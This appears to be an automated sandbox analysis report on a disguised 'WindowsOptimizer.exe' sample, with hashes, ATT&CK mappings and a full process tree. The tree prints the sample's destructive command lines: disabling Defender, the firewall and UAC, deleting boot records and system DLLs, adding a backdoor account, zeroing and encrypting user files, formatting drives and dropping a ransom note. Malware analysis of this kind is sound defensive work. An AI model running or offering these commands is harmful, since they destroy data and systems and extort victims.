Analysis
-
max time kernel
2s -
max time network
3s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 21:27
Static task
static1
Behavioral task
behavioral1
Sample
WindowsOptimizer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
WindowsOptimizer.exe
Resource
win10v2004-20241007-en
General
-
Target
WindowsOptimizer.exe
-
Size
254KB
-
MD5
5aaa262b518a3417e028e001152c9236
-
SHA1
6d1cda51302d760509822b502a8f980537d17cb0
-
SHA256
d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b
-
SHA512
722d7c1a4f87c10f34e6500d1712414f159da8ca9cb02b0b9f44f8df717345cbff473cfe5c486837ad6c9e2487677c7e22c2974f7c36c320a83ffc16812ffbca
-
SSDEEP
3072://w6PYqco8r88P7kHLWwZSO1qPZg6QpakmTjG0efuiWFExDYp1:1PYM8orWwgBeVuNpp1
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 5 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 2984 bcdedit.exe 3064 bcdedit.exe 3620 bcdedit.exe 4144 bcdedit.exe 4332 bcdedit.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid process 1172 netsh.exe -
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
format.comformat.commountvol.exedescription ioc process File opened (read-only) \??\D: format.com File opened (read-only) \??\E: format.com File opened (read-only) \??\X: mountvol.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
WindowsOptimizer.exedescription ioc process File opened for modification \??\PhysicalDrive0 WindowsOptimizer.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 4452 sc.exe 216 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
efsui.exepid process 4232 efsui.exe 4232 efsui.exe 4232 efsui.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
efsui.exepid process 4232 efsui.exe 4232 efsui.exe 4232 efsui.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WindowsOptimizer.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exenet.execmd.execmd.exedescription pid process target process PID 1480 wrote to memory of 1204 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 1204 1480 WindowsOptimizer.exe cmd.exe PID 1204 wrote to memory of 4288 1204 cmd.exe reg.exe PID 1204 wrote to memory of 4288 1204 cmd.exe reg.exe PID 1480 wrote to memory of 4844 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 4844 1480 WindowsOptimizer.exe cmd.exe PID 4844 wrote to memory of 1172 4844 cmd.exe netsh.exe PID 4844 wrote to memory of 1172 4844 cmd.exe netsh.exe PID 1480 wrote to memory of 1484 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 1484 1480 WindowsOptimizer.exe cmd.exe PID 1484 wrote to memory of 3044 1484 cmd.exe reg.exe PID 1484 wrote to memory of 3044 1484 cmd.exe reg.exe PID 1480 wrote to memory of 3944 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 3944 1480 WindowsOptimizer.exe cmd.exe PID 3944 wrote to memory of 216 3944 cmd.exe sc.exe PID 3944 wrote to memory of 216 3944 cmd.exe sc.exe PID 1480 wrote to memory of 2708 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 2708 1480 WindowsOptimizer.exe cmd.exe PID 2708 wrote to memory of 4452 2708 cmd.exe sc.exe PID 2708 wrote to memory of 4452 2708 cmd.exe sc.exe PID 1480 wrote to memory of 3304 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 3304 1480 WindowsOptimizer.exe cmd.exe PID 3304 wrote to memory of 2416 3304 cmd.exe reg.exe PID 3304 wrote to memory of 2416 3304 cmd.exe reg.exe PID 1480 wrote to memory of 2036 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 2036 1480 WindowsOptimizer.exe cmd.exe PID 2036 wrote to memory of 4056 2036 cmd.exe reg.exe PID 2036 wrote to memory of 4056 2036 cmd.exe reg.exe PID 1480 wrote to memory of 1980 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 1980 1480 WindowsOptimizer.exe cmd.exe PID 1980 wrote to memory of 4872 1980 cmd.exe reg.exe PID 1980 wrote to memory of 4872 1980 cmd.exe reg.exe PID 1480 wrote to memory of 2148 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 2148 1480 WindowsOptimizer.exe cmd.exe PID 2148 wrote to memory of 3528 2148 cmd.exe reg.exe PID 2148 wrote to memory of 3528 2148 cmd.exe reg.exe PID 1480 wrote to memory of 3588 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 3588 1480 WindowsOptimizer.exe cmd.exe PID 3588 wrote to memory of 2984 3588 cmd.exe bcdedit.exe PID 3588 wrote to memory of 2984 3588 cmd.exe bcdedit.exe PID 1480 wrote to memory of 856 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 856 1480 WindowsOptimizer.exe cmd.exe PID 856 wrote to memory of 3064 856 cmd.exe bcdedit.exe PID 856 wrote to memory of 3064 856 cmd.exe bcdedit.exe PID 1480 wrote to memory of 2516 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 2516 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 2464 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 2464 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 3628 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 3628 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 1760 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 1760 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 1844 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 1844 1480 WindowsOptimizer.exe cmd.exe PID 2464 wrote to memory of 1764 2464 cmd.exe net.exe PID 2464 wrote to memory of 1764 2464 cmd.exe net.exe PID 1764 wrote to memory of 3524 1764 net.exe net1.exe PID 1764 wrote to memory of 3524 1764 net.exe net1.exe PID 3628 wrote to memory of 4220 3628 cmd.exe cipher.exe PID 3628 wrote to memory of 4220 3628 cmd.exe cipher.exe PID 1480 wrote to memory of 4588 1480 WindowsOptimizer.exe cmd.exe PID 1480 wrote to memory of 4588 1480 WindowsOptimizer.exe cmd.exe PID 1844 wrote to memory of 4996 1844 cmd.exe fsutil.exe PID 1844 wrote to memory of 4996 1844 cmd.exe fsutil.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:4288
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off2⤵
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1172 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:3044 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop wuauserv2⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\sc.exesc config wuauserv start=disabled3⤵
- Launches sc.exe
PID:4452 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:2416 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f3⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:4056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:4872
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f3⤵PID:3528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:3064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe2⤵PID:2516
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add2⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\system32\net.exenet user TrojanUser0 ComplexPass123! /add3⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add4⤵PID:3524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"3⤵PID:4996
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddDisconnect.cab"3⤵PID:2076
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteCompare.ods"3⤵PID:4072
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteResize.mp3"3⤵PID:512
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DenyOptimize.zip"3⤵PID:1588
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\FormatSubmit.ps1"3⤵PID:2136
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\GrantGroup.dib"3⤵PID:3268
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\HideMerge.odt"3⤵PID:3264
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinMount.m1v"3⤵PID:2592
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinSelect.docx"3⤵PID:676
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeSwitch.AAC"3⤵PID:3980
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\Microsoft Edge.lnk"3⤵PID:3040
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\OptimizeGet.dwfx"3⤵PID:4316
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopInitialize.zip"3⤵PID:3060
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ReceiveConfirm.mpe"3⤵PID:1968
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoStop.asx"3⤵PID:4348
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RegisterRepair.svg"3⤵PID:4420
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ResolveStep.xsl"3⤵PID:4064
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectMove.MTS"3⤵PID:1220
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartOptimize.jpe"3⤵PID:3164
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartRestore.001"3⤵PID:1280
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepSplit.wax"3⤵PID:2832
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SwitchSave.search-ms"3⤵PID:1900
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\UnblockLock.mp4v"3⤵PID:3436
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop2⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\cipher.execipher /E /A /S:C:\Users\Admin\Desktop3⤵PID:4220
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll2⤵PID:1760
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr2⤵PID:4588
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f2⤵PID:3400
-
C:\Windows\system32\bcdedit.exebcdedit /delete {bootmgr} /f3⤵
- Modifies boot configuration data using bcdedit
PID:3620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f2⤵PID:2320
-
C:\Windows\system32\bcdedit.exebcdedit /delete {default} /f3⤵
- Modifies boot configuration data using bcdedit
PID:4144 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mountvol X: /s2⤵PID:2564
-
C:\Windows\system32\mountvol.exemountvol X: /s3⤵PID:2468
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*2⤵PID:2388
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mountvol X: /d2⤵PID:3352
-
C:\Windows\system32\mountvol.exemountvol X: /d3⤵
- Enumerates connected drives
PID:4972 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y2⤵PID:3172
-
C:\Windows\system32\format.comformat C: /fs:raw /q /y3⤵PID:920
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y2⤵PID:4408
-
C:\Windows\system32\format.comformat D: /fs:raw /q /y3⤵
- Enumerates connected drives
PID:2336 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y2⤵PID:1316
-
C:\Windows\system32\format.comformat E: /fs:raw /q /y3⤵
- Enumerates connected drives
PID:4016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f2⤵PID:792
-
C:\Windows\system32\bcdedit.exebcdedit /delete {current} /f3⤵
- Modifies boot configuration data using bcdedit
PID:4332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:216
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:388
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:3944
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2956
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:4452
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:4268
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2708
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:2568
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:3484
-
C:\Windows\system32\cmd.execmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"2⤵PID:4924
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt2⤵PID:3304
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt2⤵PID:4404
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents2⤵PID:4744
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents2⤵PID:4356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt2⤵PID:2004
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt2⤵PID:2036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures2⤵PID:3504
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures2⤵PID:3712
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt2⤵PID:3564
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt2⤵PID:884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads2⤵PID:1960
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads2⤵PID:3032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt2⤵PID:1980
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt2⤵PID:3720
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music2⤵PID:3528
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\Users\Admin\Music2⤵PID:4944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt2⤵PID:2148
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt2⤵PID:5052
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos2⤵PID:1228
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos2⤵PID:688
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt2⤵PID:4212
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt2⤵PID:1660
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData2⤵PID:3064
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData2⤵PID:3580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt2⤵PID:856
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt2⤵PID:5056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites2⤵PID:1400
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites2⤵PID:1464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt2⤵PID:2812
-
C:\Windows\system32\cmd.execmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt2⤵PID:4764
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\2⤵PID:212
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:C:\2⤵PID:2292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\2⤵PID:812
-
C:\Windows\system32\cmd.execmd.exe /c cipher /E /A /S:D:\2⤵PID:4576
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4232
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
2Pre-OS Boot
1Bootkit
1